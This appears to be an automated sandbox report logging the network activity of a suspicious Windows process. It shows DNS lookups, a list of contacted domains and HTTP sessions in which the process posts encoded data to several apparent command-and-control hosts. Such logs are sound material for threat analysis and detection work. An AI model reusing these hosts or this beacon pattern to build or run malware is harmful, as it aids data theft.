                                                                  Nov 22, 2024 14:46:21.085772991 CET1.1.1.1192.168.2.80x922fNo error (0)www.klohk.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:21.085828066 CET1.1.1.1192.168.2.80x922fNo error (0)www.klohk.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:36.395114899 CET1.1.1.1192.168.2.80x3309No error (0)www.d63dm.topd63dm.topCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:36.395114899 CET1.1.1.1192.168.2.80x3309No error (0)d63dm.top154.23.184.218A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:46:51.616297960 CET1.1.1.1192.168.2.80x7ce7No error (0)www.servannto.site31.31.196.17A (IP address)IN (0x0001)false
                                                                  Nov 22, 2024 14:47:07.115411043 CET1.1.1.1192.168.2.80x8f86No error (0)www.telforce.one64.190.63.222A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • www.huiguang.xyz
                                                                  • www.beingandbecoming.ltd
                                                                  • www.futurevision.life
                                                                  • www.schedulemassage.xyz
                                                                  • www.mcfunding.org
                                                                  • www.migorengya8.click
                                                                  • www.klohk.tech
                                                                  • www.d63dm.top
                                                                  • www.servannto.site
                                                                  • www.telforce.one

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.849707154.216.76.80801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:44:48.298755884 CET553OUTGET /hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.huiguang.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:44:49.867388964 CET827INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:44:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 601
                                                                  Last-Modified: Thu, 21 Nov 2024 04:22:01 GMT
                                                                  Connection: close
                                                                  ETag: "673eb569-259"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 63 66 39 35 66 61 33 39 66 34 61 37 32 63 65 36 62 38 35 62 62 66 62 65 39 65 61 64 62 39 35 61 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED]
                                                                  Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817'; }, 1000); // 1 }; </script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.8497093.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:05.868563890 CET831OUTPOST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 6f 7a 6c 61 4b 53 74 6c 59 6e 34 2b 68 78 36 30 64 79 6a 49 37 52 43 6b 71 33 4d 55 67 51 6e 6a 48 33 43 42 44 73 3d
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWozlaKStlYn4+hx60dyjI7RCkq3MUgQnjH3CBDs=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.8497103.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:08.530750990 CET851OUTPOST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 35 70 6b 70 66 36 52 58 4e 50 35 6b 6e 79 66 55 37 46 6e 62 33 54 4f 6d 71 47 4a 68 2b 6a 55 34 48 45 7a 75 43 30
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL75pkpf6RXNP5knyfU7Fnb3TOmqGJh+jU4HEzuC0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.8497113.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:11.188309908 CET1868OUTPOST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 6d 42 7a 68 42 7a 71 39 32 76 5a 61 6c 59 67 72 33 45 56 6d 42 41 7a 6a 4c 63 66 44 72 77 70 38 66 72 4f 58 57 63 4a 43 2f 54 50 66 2f 4f 31 4c 6e 4d 65 31 36 78 68 32 70 4c 47 74 77 72 61 59 63 56 34 6e 59 73 4b 6b 6f 53 70 33 45 44 6d 43 6c 4b 57 6f 62 55 38 61 41 66 4a 35 6b 77 33 6e 30 5a 38 34 75 61 48 4c 6f 34 48 43 6c 6d 32 73 74 41 37 69 75 79 2b 6b 30 59 4f 48 51 6a 43 43 69 67 74 49 57 48 58 51 58 69 37 4a 71 39 34 50 56 52 4e 66 73 37 73 33 36 78 70 43 73 46 43 4f [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupmBzhBzq92vZalYgr3EVmBAzjLcfDrwp8frOXWcJC/TPf/O1LnMe16xh2pLGtwraYcV4nYsKkoSp3EDmClKWobU8aAfJ5kw3n0Z84uaHLo4HClm2stA7iuy+k0YOHQjCCigtIWHXQXi7Jq94PVRNfs7s36xpCsFCOCOrMiUqTRSXKoaUc/oShZlyzvUf/8GVqaHF64bs6K9cqK+1FyiwCG47qoCLfLLDP6W/A4hQPR0tpRXEiT92kDHaOTZ1E2tIzdBbDN2R47K3Crav5wH1IML3UBjnsWIkGpf2lObVS466XHSn6lWj65K1564QMhrR9QeoUMU2gG3dOQ5SIWWCvmri83kWHBWFIHyywL0VoVWM+oOjbBaytyxmert2TlZ1sS8Mph9Zx4I9BcYJTl6Ze6a1UdIT1dsETfqR2+kW/XKOjHJnqt2lUyWREygLJkBcLiGG4vG+5GwukJRzMIu43fRJpIe6LhCydYHX1QdKnP1vslZIU/B3pEkm3v+CPL4b/niJuC/SpwA2rZFeAdduGMz7uqMDPnUHiyxoHb3m6o/zjPDRC26qhacEW2NIG9I2clU3SL4vUZnT1gOt+YoimtsoxmZV5tD/vZMeL0IlbvKHHlSuDUk0rnMgR2jGLCsGJBXUPwQ5flcOJFwjvdlvai0e0EBOjMW+O2AWhePui7/dZPv/KtBQMAmgnGtiklJuDtc6ydv8lzROYAwTAeXq0Oa+3txCfxkIF0ZZl2wzZwTHUCdqCY7WCbtVdWoEW/p2nhQYtmwDFjF8KwSF50B3RXMEVIz9Mln90p6BtgeYrskX/lTuKKC8rb4q1ifiGZJ0Loo [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.8497123.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:13.862771034 CET561OUTGET /79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:15.054389954 CET413INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 6a 48 70 54 66 68 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 77 4c 33 7a 47 59 47 61 58 59 73 49 68 38 69 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 38 43 41 6d 49 79 41 4e 55 4b 76 41 66 33 2b 35 4e 36 62 4f 7a 66 77 4c 7a 2f 47 74 71 31 5a 4e 43 30 41 74 48 2f 54 46 68 50 64 78 34 51 3d 3d 26 31 66 6f 3d 47 46 31 34 73 76 79 68 48 34 34 64 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.849713203.161.49.193801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:20.776297092 CET822OUTPOST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 55 30 61 36 55 47 71 5a 79 6a 36 69 58 6a 30 2b 74 6c 37 4c 43 41 6b 38 41 52 4a 6c 4e 74 43 5a 70 4d 61 4b 69 6f 3d
                                                                  Data Ascii: NjHpTfh=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRU0a6UGqZyj6iXj0+tl7LCAk8ARJlNtCZpMaKio=
                                                                  Nov 22, 2024 14:45:21.988147020 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:21 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.849714203.161.49.193801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:23.435933113 CET842OUTPOST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 6f 50 38 44 35 2f 67 36 77 71 44 4b 63 71 55 31 2b 37 34 34 43 71 51 6a 50 50 50 63 79 6c 2b 6f 75 6c 6f 47 49 62
                                                                  Data Ascii: NjHpTfh=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICoP8D5/g6wqDKcqU1+744CqQjPPPcyl+ouloGIb
                                                                  Nov 22, 2024 14:45:24.696316957 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:24 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.849715203.161.49.193801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:26.137670994 CET1859OUTPOST /hxmz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.futurevision.life
                                                                  Referer: http://www.futurevision.life/hxmz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
